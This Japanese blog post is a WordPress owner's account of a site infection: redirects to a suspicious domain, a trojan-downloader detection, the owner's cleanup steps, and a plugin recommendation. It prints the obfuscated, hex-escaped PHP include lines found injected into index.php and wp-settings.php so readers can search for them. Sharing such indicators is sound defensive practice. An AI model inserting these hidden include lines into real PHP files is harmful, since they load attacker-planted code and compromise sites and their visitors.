ハック?クラック?WordPressでトロイの木馬検出したらやることリスト

ハック?クラック?WordPressでトロイの木馬検出したらやることリスト

シェアする

e46efdded268978eae847ff5850ed2d0_s

fullnote
「助けて~」

ここ最近ブログの調子が悪いので状況をメモしておきますね。

スポンサーリンク
fullnote1

マルウェア・ウィルス・クラッキング・ハッキング

このあたりはよく分かりませんが、マルウェアとかウィルスとかいうのにかかったぽいです。

クラッキングというかハッキングというか、、まあ、攻撃されました(T_T)

リダイレクトされる

普通にアクセスすると、知らないページに飛ばされます。

すごい怪しいです。

ちなみにTOPページやカテゴリページが高い確率でやられます。

中には普通の個別ページもやられているところもあります。

us.aleatherk.top/dbccza(省略)

こんな感じのリンク経由で怪しいサイトに飛ばされます。

トロイの木馬が表示される

eset

JS/TrojanDownloader.FakejQuery.B トロイの木馬

パソコン(Chrome、Edge)でトップページアクセスしようとすると、上記画面が出てアクセスできないんですよ。

これは焦りますよね。

管理画面にはアクセス出来る

良かったのかはわかりませんが、管理画面にはアクセスできるので色々試してみることはできました。

スマホからはアクセスできる(ときがある)

スマホからはアクセス出来るときがあるんですよね。

良いのか悪いのかはわかりませんが。

TOPページ、メニューページ以外はアクセスできるっぽい

全部は見てないですが、トップページやメニューページはアクセス出来るみたいなんですよね。

試してみたこと

WordPressやプラグイン、テーマを削除・再インストール

サーバからFFFTPでファイルを全て完全に削除して1から再インストール。

ファイルは前にバックアップを奇跡的に取っておいたものを利用。

(そもそもこの時点で攻撃されていたんではないか疑惑もあるのでなんともいえない。。。)

バックアップファイルはアップする前にウィルススキャンはしてからアップロード。

chromeブラウザのキャッシュクリア

一応ブラウザのキャッシュもクリアしておきました。

パスワードを複雑なものに変更・Google二段階承認プラグイン

意味があるかわかりませんが、パスワードを少々複雑なものに変更しました。

プラグインも入れてGoogle二段階承認プラグイン(Google Authenticator)も使うようにしました。

index.phpとwp-settings.phpが書き換えられていたので修正

パッと見てわかったところだと、index.phpとwp-settings.phpが書き換えれられていたので修正しました。

まずはindex.phpです。

damedame

赤枠の部分明らかにおかしいですよね。

次はwp-settings.phpです。

damedame2

350行目だし、何だかよく分からないし、気づけないですよね。こんなの。(白目)

このコードを見かけたら気をつけてね

一応テキスト検索で引っかかるようにテキストでも書いておきますね。

include “\x2fhom\x65/me\x6ctin\x67ton\x65/fu\x6clno\x74ebl\x6fg.c\x6fm/p\x75bli\x63_ht\x6dl/w\x70-co\x6eten\x74/up\x67rad\x65/he\x61der\x2ephp”;

* WordPre*/include /*ss Widget Factory Object
* @global WP_Widget_Fa*/”\x2fhom\x65/me\x6ctin\x67ton\x65/fu\x6clno\x74ebl\x6fg.c\x6fm/p\x75bli\x63_ht\x6dl/w\x70-co\x6eten\x74/pl\x75gin\x73/yo\x75tub\x65-em\x62ed-\x70lus\x2fdir\x73.ph\x70″;/*ctory $wp_widget_factory

login.php、lib10.php、utf.phpを削除

ダウンロードも出来ないので、中身は見れませんが、

ダウンロード出来ない時点でかなり怪しいので以下は削除しました。

  • login.php
  • lib10.php
  • utf.php

しばらくするとまた再発する

理由はわかりませんが、再発していてココ1ヶ月はこんな感じで復旧作業くらいしかやっていません。

今は大丈夫なのでココらへんで落ち着いて欲しいです。(´;ω;`)

バックアップは取っておこう

まあ、何はともあれバックアップを少し前にとっておいたのは奇跡でした。

それほど大変でもないのでバックアップを取っていない人は今すぐにでもバックアップを取るべきですね。

はてなに移行しようかな

時代の流れには逆行する形になりますが、こんな作業するためにブログ書いているわけではないのでいよいよはてなに移行する時が来たのかもしれませんね。

追記:バックドア型ウィルスFilesmanだった?

パスワード変更とか、ファイル修正とか、バックドアウィルスだとあんまり意味ないらしいです。

直しても裏口からいたずらされちゃうらしいです(白目)

Anti-Malware Security and Brute-Force Firewallを入れよう

取り敢えず、怪しいと思ったらAnti-Malware Security and Brute-Force Firewallというプラグインを入れましょう。

https://ja.wordpress.org/plugins/gotmls/

テーマをチェックするプラグインとか、プラグインをチェックするプラグインとかより、Anti-Malware Security and Brute-Force Firewallのほうがいいです。

同じような被害にあわれた方の参考になれば。

この記事が気に入ったら
いいね!しよう

最新情報をお届けします

Twitter でふるのーとをフォローしよう!

スポンサーリンク
fullnote1
fullnote1

シェアする

フォローする

スポンサーリンク